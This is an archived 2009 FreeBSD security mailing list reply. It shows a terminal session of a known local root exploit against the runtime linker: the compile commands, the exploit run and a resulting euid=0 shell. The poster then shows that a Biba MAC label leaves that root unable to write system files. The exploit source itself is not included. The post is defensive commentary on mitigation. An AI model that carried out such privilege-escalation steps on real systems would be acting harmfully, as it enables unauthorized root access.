Site Navigation

Date:      Tue, 1 Dec 2009 18:41:07 +0100
From:      Borja Marcos <borjam@sarenet.es>
To:        freebsd-security@freebsd.org
Cc:        FreeBSD Security Advisories <security-advisories@freebsd.org>
Subject:   Re: Upcoming FreeBSD Security Advisory
Message-ID:  <CE6953AE-C4FD-4DD3-831D-ED4215A9AE93@sarenet.es>
In-Reply-To: <200912010120.nB11Kjm9087476@freefall.freebsd.org>
References:  <200912010120.nB11Kjm9087476@freefall.freebsd.org>

---

next in thread | previous in thread | raw e-mail | index | archive | help

---

On Dec 1, 2009, at 2:20 AM, FreeBSD Security Officer wrote:

> A short time ago a "local root" exploit was posted to the full-disclosure
> mailing list; as the name suggests, this allows a local user to execute
> arbitrary code as root.

Dr. Strangelove, or How I learned to love the MAC subsystem.

# uname -a
FreeBSD test 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri Nov 20 13:20:06 CET 2009
root@test:/usr/obj/usr/src/sys/TEST amd64


$ gcc -o program.o -c program.c -fPIC
$ gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
$ ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=1001(portero),0(wheel)
# /usr/sbin/getpmac
biba/high(low-high)

And of course it's root.

Now,

$ setpmac biba/low\(low-low\) csh
%pwd
/tmp
%./env
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# 
** OMG!! IT WORKED!!. 

BUT

# touch /etc/testing_the_exploit
touch: /etc/testing_the_exploit: Permission denied
# ls -l /usr/sbin/getpmac
-r-xr-xr-x  1 root  wheel  7144 May  1  2009 /usr/sbin/getpmac
# /usr/sbin/getpmac
biba/low(low-low)

OOHHHHH, we have a toothless root. Maybe a "riit"?


Pity these serious security mechanisms don't get a widespread usage.






Borja.

---

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?CE6953AE-C4FD-4DD3-831D-ED4215A9AE93>

Legal Notices | © 1995-2024 The FreeBSD Project. All rights reserved.

Contact